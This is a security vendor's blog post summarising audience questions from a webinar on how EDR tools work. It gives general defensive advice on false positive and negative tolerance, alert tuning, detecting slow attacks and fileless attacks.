Threat Detection

The Top Questions People Are Asking About Their EDR Tools

March 28, 2024
To many, the EDR is a complex illusion. In a recent webinar, Principal Security Engineer Matt Hand broken down the agents and sensors that make up modern EDR tools and what security engineers can learn from their tools.

Endpoint Detection and Response (EDR) platforms provide the foundation for most organization’s cybersecurity infrastructure. Designed to continuously monitor and respond to threats, the best EDR tools help security teams identify, investigate, and mitigate malicious behavior. 

As it turns out, EDRs aren’t at their best right out of the box. They require constant tuning. Further still, they remain a bit of a black box to the teams responsible for managing them and maximizing their potential. 

Understanding the sensors, agents, and drivers that make up the modern EDR - and the telemetry they produce -  provides valuable insight into tuning and optimizing your defenses. Last month, Principal Security Engineer Matt Hand took viewers under the hood of their EDRs—these are some of the top questions from our viewers. You can access the whole recording here

What should you consider a good false positive or false negative ratio in your EDR?

Like many scenarios, this question comes down to your organization. There’s no one-size-fits-all approach. A car dealership might have a higher tolerance for false negatives than a defense contractor because the scope of what they’re protecting is incredibly different. Where one protects their financing and pricing information, the other protects schematics for missiles. 

A team working to protect critical infrastructure or valuable IP has a lower tolerance for false negatives where they end up missing malicious behavior or false positives where they waste precious time chasing alerts that amounted to nothing. Both of these scenarios put strains on the security team to hyperfocus on every alert, and ultimately drive inefficiency. 

The solution, Matt says, is for SOC teams to look beyond the noise and focus on the cause and sources behind it.  Are false negatives and positives excessive, and do the data sources generating these inaccuracies offer real value?

It's about identifying ways to enhance the value of these sources and determining what can be sensibly filtered out. Ultimately, the balance of false positives and negatives is a decision each organization must tailor to its specific needs and context.

What are best practices for SOC teams to separate signal from noise? 

If threats are moving at machine speed, you need to be responding at a similar pace. That’s why Matt recommends first targeting the longest investigative chains for tuning and filtering. 

If investigating a particular alert requires a significant workload and lengthy process on the part of your operations team, it’s more time sunk into evaluating false positives or worse—a missed opportunity to prevent a breach. Investing time in tuning and filtering out inaccuracies in these alerts significantly improves your efficiency and effectiveness while reducing noise.  

How can defensive engineers enhance detection queries for slow attacks?

In a perfect world, your EDR could process and flag chains of activities happening over time, but doing so would require storing and correlating across a prohibitively expensive amount of data. Most EDRs introduce constraints in the form of time-bound windows where a chain of events must occur for it to be flagged. Threat actors who space out their activities might not be caught because your EDR sees these behaviors as unrelated.

So, how can defensive engineers respond?

The solution requires changing our perception of what we perceive as malicious. Instead of requiring multiple actions to happen sequentially to trigger a detection, Matt recommends placing more weight on certain independent actions that might signal another.

For example, service creation is a powerful tool for hackers. If your detection is based on a service created and that service starting in a constrained window, you might miss some things. Instead, consider placing a weight on one of those two actions occurring to trigger a response. 

Using EDR telemetry, what approach would you recommend for fileless attack types? 

EDR tools are purpose-built for these types of scenarios. When there is no particular file to look for, defensive teams can leverage their EDR to monitor for patterns and anomalies within system or network behavior that suggests malicious activities. 

These can be anything from unusual file access, suspicious connections, unexpected application behavior, and more. By building detections around these behaviors, EDR enables teams to focus on what the malware does, rather than the presence of a malicious file. 

Making the most of your EDR

While vital, your EDR is a piece of software. Those teams operating and tuning it to the unique needs of their organization are responsible for making the most of the tool so it can perform at its best. 

Understanding the inner workings of the EDR can be a massive boon to a defensive team’s ability to create better detections and maximize their resources. For more insight into how these tools work, check out Matt’s presentation or pick up a copy of his book: Evading EDR: The Definitive Guide to Defeating Endpoint Detection Systems.

Stop wondering how your EDR actually works

Matt Hand breaks down the agents and sensors that make up the modern EDR—and what we can learn from them.